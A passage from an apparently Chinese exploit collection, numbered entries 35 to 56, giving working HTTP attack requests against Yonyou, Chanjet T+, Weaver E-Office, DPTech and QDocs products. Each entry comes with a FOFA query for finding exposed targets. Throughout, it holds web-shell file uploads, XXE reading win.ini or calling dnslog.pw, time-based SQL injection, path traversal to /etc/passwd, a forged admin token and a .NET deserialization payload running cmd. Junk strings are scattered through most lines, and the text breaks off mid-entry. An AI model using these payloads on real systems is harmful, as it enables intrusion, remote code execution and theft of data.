35. 用友NC-Cloud importhttpscer任意文件上传3 a9 [, {+ y; r) T1 M V
FOFA:app="用友-NC-Cloud". C+ X! b: e1 X. U7 M
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1+ A* B7 r9 K% w c
Host: 203.25.218.166:88885 r0 y+ Q2 R/ G2 g' I
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info+ E4 Z3 N' h: \
Accept-Encoding: gzip, deflate
% V6 O6 |6 r$ _, m W) c/ {Accept: */*
9 y/ T& j( B* x# T8 k0 uConnection: close
: b7 _: G2 e' B7 b: P, PaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA: D' E; u* ~" j: ?1 H
Content-Length: 190 }: D( \ R! J: j/ ^: U/ m8 G
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
! i/ |* F+ W: l( y; Z3 f
5 S: D. W- r2 h$ M/ Q--fd28cb44e829ed1c197ec3bc71748df0, s" y2 a/ @8 ?, |2 F+ @ M
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"- `$ [' a5 D* b0 S6 C: M
, y: F& C$ [' l. f
<%out.println(1111*1111);%>
. ]8 S# T5 I: n--fd28cb44e829ed1c197ec3bc71748df0--# h _) o1 J+ {7 e+ r" d
$ C3 L7 ?- A' K$ ?: N* V3 M
% ~+ w( w* i* v1 G n: C! i, w36. 用友NC-Cloud soapFormat XXE( W b; N4 a4 q( m/ L. ~8 Z
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
9 o' d. D- A2 x8 `. q% MPOST /uapws/soapFormat.ajax HTTP/1.1
" G5 o) J4 q" Y5 AHost: 192.168.40.130:8989/ n7 C$ u1 c4 F# ~5 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.04 V. {/ f) \2 j$ z' N
Content-Length: 263! X. m q" T4 a5 a* _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! ^1 P( o1 a/ ]" k- bAccept-Encoding: gzip, deflate
# \! I; c. r& F6 u9 t4 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: e3 ~! H4 H7 T: e6 Y+ a2 E
Connection: close. Z. M! w- C: T3 q; [# b
Content-Type: application/x-www-form-urlencoded) w- q$ v) x1 ]+ E# P* H
Upgrade-Insecure-Requests: 1
; v0 V7 M! U$ |/ h6 h" K7 X- j9 C0 m t* t; g: j3 b4 |
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a/ P2 x/ t7 e" {) }& p0 Q4 a
2 J5 O3 ^/ _. e; @3 Q0 }* E
5 a; [) X, d1 V3 O37. 用友NC-Cloud IUpdateService XXE
2 C5 M/ [. T2 M& t/ [* I) g, sFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"8 p2 D3 K0 U. P, X& E! V) j
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1- h. b6 O1 O* N4 E/ t6 `0 s
Host: 192.168.40.130:8989
6 r( U' O# {0 `* l/ m8 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.362 g" o5 r- F- N- x5 z$ `4 I1 l
Content-Length: 421
: ?: x( F: k( |2 x& w" WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' k- _) I2 f0 S
Accept-Encoding: gzip, deflate$ c; ^# W, J8 y. F: S% w
Accept-Language: zh-CN,zh;q=0.9* P# C! J; l9 w: P) M3 [5 i5 g+ i3 h$ n
Connection: close
* ^8 }. l7 f) D: S# E6 t$ @: LContent-Type: text/xml;charset=UTF-8
9 C' o. H0 a5 k8 n4 k$ E2 z+ \* `: ASOAPAction: urn:getResult2 k5 B% Q7 H" Y! @: Z; T
Upgrade-Insecure-Requests: 1
2 O, @7 U1 D m+ I3 b# L
; Z: f( \ s2 J<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">- K6 S( O9 L5 g! J
<soapenv:Header/>; N; R7 Y, o3 O( A' u0 j
<soapenv:Body>
3 P. a, [# \3 ~( ?1 U9 K3 w/ z$ U<iup:getResult>7 w; F o0 C7 m6 h9 Q* S/ _) b% Q2 r! ~
<!--type: string-->
; Z( |+ W/ [2 ^+ \8 p<iup:string><![CDATA[0 U+ F$ n7 Y! f2 l9 v
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]># R/ M4 t/ C; S/ s' r1 i
<xxx/>]]></iup:string>- {: [8 m, P' ?2 g( E! ]; ]
</iup:getResult>9 i2 d/ o7 Q( g, c; u. Y1 a
</soapenv:Body> V3 b# ?! U8 e/ b- X2 M
</soapenv:Envelope># h# u; y; Z4 L6 D3 y4 |& A" M
" P3 L8 ]9 q- W& X4 v' D
" N' L0 @( I% c- k! a' A9 y: g) J3 ?
7 Y& B1 M6 j% t7 ^; | ]+ R* T$ d1 G38. 用友U8 Cloud smartweb2.RPC.d XXE
9 T9 e7 K. v3 ]FOFA:app="用友-U8-Cloud"
( t/ i+ G* u6 V7 d6 H4 e; e5 Z$ \# gPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
3 H! `% f0 d# Q$ ^7 _& o! N2 ~Host: 192.168.40.131:8088+ ?# @) d( c( e5 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25- z+ g) r( e. a! U# }* F
Content-Length: 260; C* X0 r9 s( T- h- r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3% V$ |, Z9 g- C( \2 M1 m
Accept-Encoding: gzip, deflate- l+ `9 I' m! a! p$ Z* l
Accept-Language: zh-CN,zh;q=0.9
7 B+ S& v/ g; L( F9 }/ pConnection: close
! C% S) Y c8 R# c$ ?! x kContent-Type: application/x-www-form-urlencoded1 v* H1 d' b' B) C9 l
1 E8 {* }/ x9 M1 O5 X4 z__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
- t( J2 s0 V% j7 s5 e
& v3 i2 T; ?4 F2 |) ^, c% G5 n K) k; y* U) p
39. 用友U8 Cloud RegisterServlet SQL注入# b) g- L3 Y! g/ L
FOFA:title="u8c", W0 k3 }2 M2 o% s: R5 Z$ q$ n
POST /servlet/RegisterServlet HTTP/1.1* E- [) O/ `6 t4 V4 \0 f
Host: 192.168.86.128:8089
6 b8 T2 @$ p9 s1 g/ I6 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
3 A2 J! Y1 c) j0 {/ CConnection: close
5 e4 v6 b; w! U& w V" B2 }Content-Length: 85
+ e9 T: B% l }! L( V$ TAccept: */*4 C- _6 |6 l R4 ^# |# a. N
Accept-Language: en
" c8 s: z/ c& d! T# g2 W( l! y3 XContent-Type: application/x-www-form-urlencoded! X0 l5 P3 g" x# M( j
X-Forwarded-For: 127.0.0.1
* _6 e6 r8 D" a3 C, XAccept-Encoding: gzip, v/ O+ A& W% @! f7 @1 b- [. h
! @; N2 j4 M2 G: ?$ i3 `/ ~
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
# U, L7 w! {; T7 `# H. q' j4 Y! e( v0 t2 b
% {2 S! b6 t) ]& t7 a) t; h40. 用友U8-Cloud XChangeServlet XXE, z: n9 g6 E' Y( k! W
FOFA:app="用友-U8-Cloud"
3 {' g0 V" c) Y$ v+ ]POST /service/XChangeServlet HTTP/1.1. l' u# E3 c( \9 u6 Z9 t
Host: x.x.x.x
" {4 ?- Y% J; k1 lUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
. S/ D) p6 D, ~: i$ N6 SContent-Type: text/xml
3 N$ l! ?* j: T5 v, [) DConnection: close
2 F. T" m5 |* ~
7 L7 k% |4 K- X. ]; X2 x* P<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
% V, _( B* a, k t" F H
6 x p& O: f7 ?- x5 @* Z$ q
0 `; c0 x7 K# W, V. v# Z4 Z41. 用友U8 Cloud MeasureQueryByToolAction SQL注入3 v5 t. Z% M. i" ^5 V
FOFA:app="用友-U8-Cloud"* `' W3 @) O& Z9 d( ]0 b
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1% H2 |" \; V( x4 ^# |% ]/ J& c
Host:( @$ A5 s$ }7 @5 s# W3 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" `9 D. m; l7 W, w
Content-Type: application/json# Z8 t i" y) h# x- D, C
Accept-Encoding: gzip
' I0 s1 m% K: z; F8 zConnection: close
, ]8 C6 ^% Z( U' D# ~9 G( F8 f/ u9 Q2 F# |! O# [8 u6 C' ~8 i
' a/ Q6 h( {6 [9 h42. 用友GRP-U8 SmartUpload01 文件上传
( v0 m" B# M/ eFOFA:app="用友-GRP-U8"3 G$ E& i# D: U$ Y6 I
POST /u8qx/SmartUpload01.jsp HTTP/1.1( Y4 ^3 c* g. d
Host: x.x.x.x5 ^! p* D7 ?9 C( }
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
+ l) S7 c$ @; gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
% g& G1 w0 M, ^; [2 R3 d" T5 t! m* f7 G! k# }
PAYLOAD
_2 ? u7 @! L3 f3 m' m. s5 @9 }' x' t: [) B, H0 B. i0 F
; h3 _# ~$ E8 z, b3 j; f0 |http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
- N9 h' m! |4 u7 C* R/ U
1 [ x6 \6 w& o/ Y/ u% R+ i: W43. 用友GRP-U8 userInfoWeb SQL注入致RCE4 r$ x" K6 F* h8 @. x* \9 R
FOFA:app="用友-GRP-U8"
8 t% W8 `) C, k% Q7 E. a5 UPOST /services/userInfoWeb HTTP/1.16 a9 V0 U3 |8 h; X5 g
Host: your-ip
6 E8 V- Z- X/ |* b9 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36+ N+ @- i2 H I0 [/ I# q! F* d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ {$ O- k1 p- q" i. N( K9 `
Accept-Encoding: gzip, deflate$ j1 S: ]+ R% e% N3 u; }6 \
Accept-Language: zh-CN,zh;q=0.9$ ?$ d( T; l+ O! L6 `
Connection: close
, D( h' @ m, L/ R/ O$ eSOAPAction:
" m/ I d" ~7 N" V1 f) mContent-Type: text/xml;charset=UTF-8: b! G, N. `% O e
( {6 G8 e/ ~0 O' _
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
3 z8 N' l) u5 _ <soapenv:Header/>
1 s) e1 c9 Y8 x& X <soapenv:Body>
B" K1 _4 R, g" b9 Y9 b <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
5 _# W4 Z) \$ d5 _8 m- X <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>1 g6 v" k" ^# T* N- H$ e4 f
</ser:getUserNameById>7 O7 ^! P* t8 k
</soapenv:Body>! i6 @, x/ z3 Q& x* \0 S1 `
</soapenv:Envelope>, P4 {' \" c$ S. |
) u! Y7 c! ]4 E7 }/ ?. M: b0 s) W0 v5 m; K8 g1 X
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
+ Y7 I2 h% u' d; k- UFOFA:app="用友-GRP-U8"! C; a. l- e6 x! l2 U
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.11 Q: ~0 p, o! E
Host: your-ip8 t6 P% c/ M6 k; R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.366 y$ {& M7 f+ l) ?/ P4 x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) e3 [, p5 T- N' FAccept-Encoding: gzip, deflate0 e5 o6 t: B; X- \6 o
Accept-Language: zh-CN,zh;q=0.95 L' X; @& f2 r, R* o$ b% {4 e
Connection: close" E$ ?3 b( j: t9 n( n
9 h: `. o5 d' ^2 R% |
+ z7 \0 I8 m0 a45. 用友GRP-U8 ufgovbank XXE! Z4 J/ _# J* \, ?& N% _6 G, |
FOFA:app="用友-GRP-U8"6 F6 J$ n7 z$ k+ F% b5 T6 y4 x
POST /ufgovbank HTTP/1.11 m5 j( _ b! a8 ~% H
Host: 192.168.40.130:222
; ] Q3 Q# c4 }7 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0; c& N6 c) k& N
Connection: close
& ]! O, I r' ~! WContent-Length: 161' |. h' o# W5 @9 U$ E$ N' A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# D1 E* ?; n: BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; G* G7 K K ?3 IContent-Type: application/x-www-form-urlencoded
0 H" q9 U3 T2 ?Accept-Encoding: gzip
3 E0 Z6 v1 \: ], D, I. r! Z& A$ b+ V+ A- f* N: A
reqData=<?xml version="1.0"?># D- c t' K# m* B: i7 A8 I0 ?6 t
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
$ o$ j! Z: U+ Z; n2 S5 A# d, m* F5 z4 r5 T K- c* w
2 w6 \$ R, s5 t( G, ^* ~6 s; L
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
" _' c- ^$ y$ rFOFA:app="用友-GRP-U8": N! }! s7 N# N* ]1 Q) j2 \
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
# }* N3 A9 W) f+ p& q/ Z# ?Host: your-ip3 x% C# P4 W, g: L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36# V9 j1 ]* x& T6 B" c1 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: Z( _7 \. Z& v7 E) i
Accept-Encoding: gzip, deflate
' W1 k3 j/ g8 A+ U lAccept-Language: zh-CN,zh;q=0.9; m: R9 v) J/ ]; z) i3 s# s
Connection: close$ H# j; Y6 D; M. P# ~
) j8 x6 R. ~. ~: _0 w
! r) d2 ^+ g* G, U4 l
47. 用友GRP A++Cloud 政府财务云 任意文件读取 g' A* i( _; @( K; Y7 U
FOFA:body="/pf/portal/login/css/fonts/style.css"
, t3 b+ z0 l w& v- N2 IGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
" z" l4 H# I& `1 ]Host: x.x.x.x
+ G3 E- x! ~1 z6 h$ t0 qCache-Control: max-age=02 p- P3 b% ]. [8 x- q
Upgrade-Insecure-Requests: 1; h% I8 F0 j8 y: V! Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.363 l+ q8 q3 M5 S: O& r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; M# S3 c0 m* J) U
Accept-Encoding: gzip, deflate, br T$ j8 |# g: d5 P3 z9 ^) L+ ?
Accept-Language: zh-CN,zh;q=0.93 y H q1 B0 W3 a
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
1 Q- e& q2 \! U0 lConnection: close
( a( P1 a4 A; |! q+ J3 f4 A, V
$ i/ K% b* G- X0 z* X9 e4 X" J# ? u6 B" Z5 W
( F6 o. w# d. L& |& `; h6 x; N
48. 用友U8 CRM swfupload 任意文件上传
, L7 b! ~3 B7 V$ ^! W R# T) s" y) IFOFA:title="用友U8CRM". \7 c" N3 x o" ]8 z
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1* F4 U- E% W' |+ s- j
Host: your-ip
! h( u0 D5 Q) E+ @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.03 k* D3 J$ ?. e& p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. o4 Y2 b! S7 P9 r, k% N m( Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 F# P {1 s6 }5 [Accept-Encoding: gzip, deflate
( c6 L/ B8 E& z7 j. J) mContent-Type: multipart/form-data;boundary=----2695209672394068716424300668551 s. T! S9 G- g: u% ^/ @: A$ V
------269520967239406871642430066855
- e/ w4 a l; ?% r' n; q5 v+ T! ]Content-Disposition: form-data; name="file"; filename="s.php"* U K( }7 u% e6 b! H
1231' E7 y3 I F6 H+ q' H
Content-Type: application/octet-stream/ V3 a6 l5 g. Y1 l3 k
------269520967239406871642430066855
5 q/ N" h0 Z7 ~- A2 XContent-Disposition: form-data; name="upload"9 r9 K; H5 h9 o6 w9 z# O" [$ x
upload( z G% t4 Z( ^; t" x
------269520967239406871642430066855--
7 X- Z4 F; ?# ^" y0 t9 D$ s1 s+ r& U& p0 D$ s0 ^' q
( b( e2 T+ `6 w* g( M
49. 用友U8 CRM系统uploadfile.php接口任意文件上传3 X V) o, l5 ~7 z/ `! p2 E
FOFA:body="用友U8CRM"
1 H6 j5 z! Z( B0 M4 \
% V7 p3 O$ e hPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1) L$ M, W# n6 L' f; S- g1 d
Host: x.x.x.x
2 @: w+ n" w$ g4 B1 {; i" b% ?1 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 L% D* C$ g: ~/ E( Q+ c7 X( L( y
Content-Length: 329
" d2 {$ x3 @( r5 J2 t& xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 D: E$ l0 V' `- n7 GAccept-Encoding: gzip, deflate4 j$ b. Q, h7 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ k/ i. Q) d6 J' n* jConnection: close" c) D1 Z, s% W1 ~) T& C8 A. _4 {
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
- J* _4 [2 c( J; ?2 L. `( n/ w C9 V& ~8 v
-----------------------------vvv3wdayqv3yppdxvn3w
9 s/ M/ D: c: t5 U3 r8 g0 U( A' rContent-Disposition: form-data; name="file"; filename="%s.php "/ p+ E7 _8 J6 N) z( m
Content-Type: application/octet-stream
2 W9 N; z9 W; g+ T. V# a$ Z& z2 K9 O9 D0 s: w& Z! S% c
wersqqmlumloqa2 x% U# F3 Z+ h% P: _
-----------------------------vvv3wdayqv3yppdxvn3w/ E' V; h* Q7 ?/ j' ?) L
Content-Disposition: form-data; name="upload"
* V M6 W& x$ W7 t- N
c5 \+ \0 H( ^2 C2 [upload, J# I# X* Y) e" o, m4 W
-----------------------------vvv3wdayqv3yppdxvn3w--
" \, g% ]: r O9 u
" I- u9 ]- _5 y9 M. \ d! q4 Z$ d) {8 `, l
http://x.x.x.x/tmpfile/updB3CB.tmp.php- ?/ R& p+ M4 a9 x, w+ a
' M" l; t9 n* m3 \; k4 R: f50. QDocs Smart School 6.4.1 filterRecords SQL注入
- \* [7 Y+ l6 mFOFA:body="close closebtnmodal"$ u; |. N- n- U
POST /course/filterRecords/ HTTP/1.1
* F; K( W/ W! `* Q5 J7 X" f6 yHost: x.x.x.x _) y4 n2 q f( q6 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
# i* u* W5 l/ O! vConnection: close
' L9 v) ?% Q4 h3 m# BContent-Length: 2249 L4 m+ o4 L. g+ V
Accept: */*
j! M3 {2 g9 RAccept-Language: en. X- n& e) p4 }9 w+ |
Content-Type: application/x-www-form-urlencoded$ q# c9 j, W6 }
Accept-Encoding: gzip
, F: g3 u, U: ]" j! A# W; N( g6 F* D) r5 z
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1. @6 `. |2 a2 M
& ~- c+ M5 R) X) o) r3 A! x$ u7 s! h [" r0 i+ L
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入. x6 p' e: p1 q9 R$ _# k
FOFA:app="云时空社会化商业ERP系统"
4 H3 E2 U7 X5 w. Q) i) _: C9 q0 v4 bGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1. B0 ~1 B c$ R p( x2 C! `. f
Host: your-ip" m- c! M9 m. z% p$ f9 ]' P
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
& [" ?* F; s9 r& l& a9 v7 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 K: J5 ~5 {# A1 E$ U' f. e$ F7 E
Accept-Encoding: gzip, deflate
5 { U. Q5 M/ b( h! dAccept-Language: zh-CN,zh;q=0.9* ]2 r; Y2 V' C
Connection: close
/ R! n Y1 d' x S. w; K- q" c9 y2 F7 E8 i3 k6 W. @ u4 |% f
) m7 a' G$ l& f/ @9 l4 X* D* b$ q
52. 泛微E-Office json_common.php sql注入3 Y, w% c# c% H! B$ H" K
FOFA:app="泛微-EOffice"7 |& n9 e' i( m F/ S, I
POST /building/json_common.php HTTP/1.1
4 w# H7 I7 `* |+ PHost: 192.168.86.128:8097
0 E3 l/ g0 n3 t* o7 C7 PUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36. [, a$ k s: V* @# [
Connection: close
6 B) `; H/ h8 {Content-Length: 87$ ]' g- H9 @$ X
Accept: */*
8 O( ]9 u& ]6 q+ cAccept-Language: en0 m9 `1 v( x. ^7 d: m" u% J
Content-Type: application/x-www-form-urlencoded4 S& j% o7 C! @+ k+ F z
Accept-Encoding: gzip% r5 V8 `: R) R1 [
: |# y9 j; t0 s5 C! |
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
$ x* ]2 N1 {& c. |1 O( r
% _; g. o4 [* l0 _" `- j, i, n. u4 Y' z
53. 迪普 DPTech VPN Service 任意文件上传$ \1 h. v1 d) ]% b' Z% S
FOFA:app="DPtech-SSLVPN"
3 U' B% u% V" r* t" |) j! u/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
6 e+ c1 ~& x9 h9 a
. l. z/ Z3 j7 h
j2 T# a6 h/ e# G% z8 t54. 畅捷通T+ getstorewarehousebystore 远程代码执行
; g' ]- h0 j6 \/ {" ^* IFOFA:app="畅捷通-TPlus"$ s! D) ^& `8 Q4 Q0 I" ]
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件& B' e" u& v5 l9 Y" }
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
0 K1 |+ a( i# n. D" J+ E9 c) @2 u- X6 d# q
1 I, A% r- P+ D, X; ~
完整数据包( b9 x% X4 U. V6 H2 J
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.11 _2 @6 f' [8 ?, D! z6 x6 B
Host: x.x.x.x- q4 E% a3 R: G
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
; }* q- k) d }9 J7 ~Content-Length: 593
9 {! k/ s0 k) w3 B2 o7 D
2 n% d% Y% \6 v8 M1 V0 n{
/ {7 f8 I# C! e4 }) ~"storeID":{+ q, I' B2 p# {+ s5 I* n; |3 ?3 F* j
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",& O( U6 ]2 N& O4 z# a+ Z, @3 r
"MethodName":"Start",
1 `; q; U" `( L& U: {* ^ "ObjectInstance":{8 J! T- ?- a- i$ {, }
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
. |- _( u3 v4 x: B" a* R. h "StartInfo":{
7 _& Y5 h! P/ U* y "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) C6 \( M* M* k" \. \ D. d
"FileName":"cmd",
# I" p0 X: s7 |1 n. c "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"* d/ M$ P( | R% W9 R5 z/ r
}2 s7 J& b; l J+ v- ~$ x6 p
}
1 w. d: F H) j: [7 a }( L# g8 P8 S7 Y0 W" f; [$ U
}
8 }: _8 J* \3 K8 Z7 h) z: y* k, \& C6 n9 X7 Y0 p
: a5 I. P4 d* h3 m( [1 S
第二步,访问如下url
+ x4 t. F& c1 A# y/ z) @6 j: E8 a: u/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt# [$ }) N" X# ~* z; r. U3 J
# s8 J& x9 D: c0 b( J# E) M4 J* ~* S1 [- v2 C/ a' T; D
55. 畅捷通T+ getdecallusers信息泄露
& O% d" [& u% C2 D& aFOFA:app="畅捷通-TPlus"2 h$ ^9 I( B+ Z
第一步,通过! Z/ m1 w/ D6 S* s; J
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
7 W9 T6 i1 \$ e3 i, E0 P第二步,利用获取到的Cookie请求9 N. L" N, c$ }
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers+ |( q) F7 V5 E0 i9 ~: x& D
& [: v; U; j8 _9 s' m6 L( |; k, |3 k+ ?
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
4 X& s0 Q2 E% ~* l( x3 |# r3 i7 uFOFA: app="畅捷通-TPlus". n7 F: I* U9 ]/ `4 a
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
( ?0 P/ w# I" g; `7 M4 s( A: oHost: x.x.x.x
